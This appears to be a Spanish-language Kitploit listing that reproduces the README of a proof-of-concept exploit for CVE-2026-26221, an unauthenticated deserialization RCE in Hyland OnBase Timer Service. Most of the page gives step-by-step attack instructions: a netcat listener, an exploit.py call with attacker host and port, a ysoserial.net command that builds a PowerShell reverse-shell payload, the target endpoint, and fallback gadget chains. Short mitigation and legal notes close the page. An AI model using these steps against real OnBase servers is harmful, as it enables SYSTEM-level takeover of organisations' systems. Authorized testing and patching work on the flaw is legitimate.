Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-26221-Hyland-OnBase-Timer-Service-Unauthenticated-RCE — Exploit de prueba de concepto para la ejecución remota de código no autenticada en Hyland OnBase Timer Service mediante la deserialización de BinaryFormatter en .NET Remoting, logrando privilegios de SYSTEM. | Kitploit
Herramientas/GitHubGitHub/mbanyamer/cve-2026-26221-hyland-onbase-timer-service-unauthenticated-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubmbanyamer/cve-2026-26221-hyland-onbase-timer-service-unauthenticated-rce

CVE-2026-26221-Hyland-OnBase-Timer-Service-Unauthenticated-RCE

Exploit de prueba de concepto para la ejecución remota de código no autenticada en Hyland OnBase Timer Service mediante la deserialización de BinaryFormatter en .NET Remoting, logrando privilegios de SYSTEM.

Ver Repositorio
hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

📡 Hyland OnBase Timer Service RCE No Autenticado

Mohammed Idrees Banyamer

Investigador de Seguridad

Jordania 🇯🇴

Author Role Country Platform Vulnerability CVE CVSS Status


🧨 Descripción General

Este repositorio contiene un exploit de Prueba de Concepto para la vulnerabilidad de ejecución remota de código no autenticada en Hyland OnBase Timer Service mediante deserialización insegura de .NET Remoting BinaryFormatter.

La vulnerabilidad permite a un atacante no autenticado enviar un payload BinaryFormatter manipulado al endpoint del Timer Service y ejecutar código arbitrario como NT AUTHORITY\SYSTEM.

  • Producto: Hyland OnBase Workflow / Workview Timer Service
  • Puerto: 8900/TCP
  • Autenticación: No requerida
  • Impacto: Ejecución Remota de Código
  • Privilegios: SYSTEM
  • CVE: CVE‑2026‑26221
  • CVSS: 9.8 (Crítico)

⚙️ Detalles Técnicos

El Timer Service expone un endpoint de .NET Remoting:

root@kitploit:~
http://TARGET:8900/TimerServiceAPI.rem

El servicio acepta objetos BinaryFormatter no autenticados. Al proporcionar una cadena de gadgets maliciosa (ysoserial.net), se produce la ejecución de comandos arbitrarios durante la deserialización.


📦 Requisitos

  • Python 3
  • requests
  • ysoserial.net
  • Listener netcat
  • Entorno de generación de payloads para Windows (Windows / Mono / Wine)

Instalar dependencia de Python:

root@kitploit:~
pip install requests

Descargar ysoserial.net:

root@kitploit:~
git clone https://github.com/pwntester/ysoserial.net

🚀 Uso

1️⃣ Iniciar Listener

root@kitploit:~
nc -lvnp 4444

2️⃣ Ejecutar Exploit

root@kitploit:~
python3 exploit.py 192.168.10.50 --lhost 192.168.1.100 --lport 4444

3️⃣ Generar Payload

El script imprime un comando de ysoserial. Ejecútalo en otra terminal (Windows / Mono):

root@kitploit:~
ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c "powershell ..." -o raw > rev_shell.bin

4️⃣ Enviar Payload

Presiona ENTER en la terminal del exploit después de generar el payload.

Si es vulnerable → la reverse shell se conecta.


🧪 Ejemplo

root@kitploit:~
python3 exploit.py 10.10.10.123 --lhost 192.168.5.77 --lport 9001

🔧 Opciones

OpciónDescripción
targetIP o nombre de host objetivo
--portPuerto del Timer Service (por defecto 8900)
--endpointTimerServiceAPI.rem / TimerServiceEvents.rem
--lhostIP del atacante
--lportPuerto del listener
--gadgetCadena de gadgets de ysoserial

🧯 Notas

  • El exploit es ciego

  • Éxito = callback de reverse shell

  • El servicio se ejecuta como SYSTEM

  • Prueba gadgets alternativos si está bloqueado:

    • TextFormattingRunProperties
    • ObjectDataProvider

🛡️ Mitigación

  • Aplicar los parches del aviso de seguridad OB2025‑03 de Hyland
  • Deshabilitar la exposición de .NET Remoting
  • Restringir el acceso al puerto 8900
  • Monitorear el uso de BinaryFormatter

📊 Flujo del Ataque PoC

root@kitploit:~
sequenceDiagram
    participant A as Atacante
    participant Y as ysoserial.net
    participant T as Servicio Timer OnBase Objetivo
    participant S as Shell SYSTEM

    A->>A: Iniciar listener netcat
    A->>Y: Generar payload BinaryFormatter
    Y-->>A: rev_shell.bin
    A->>T: HTTP POST /TimerServiceAPI.rem
    T->>T: BinaryFormatter.Deserialize()
    T->>S: Ejecutar cadena de gadgets
    S-->>A: Conexión reverse shell

⚠️ Aviso Legal

Este exploit se proporciona para:

  • Investigación de seguridad
  • Pruebas de penetración autorizadas
  • Validación defensiva

El uso no autorizado contra sistemas que no posees o para los que no tienes permiso de prueba es ilegal.


Descargar herramienta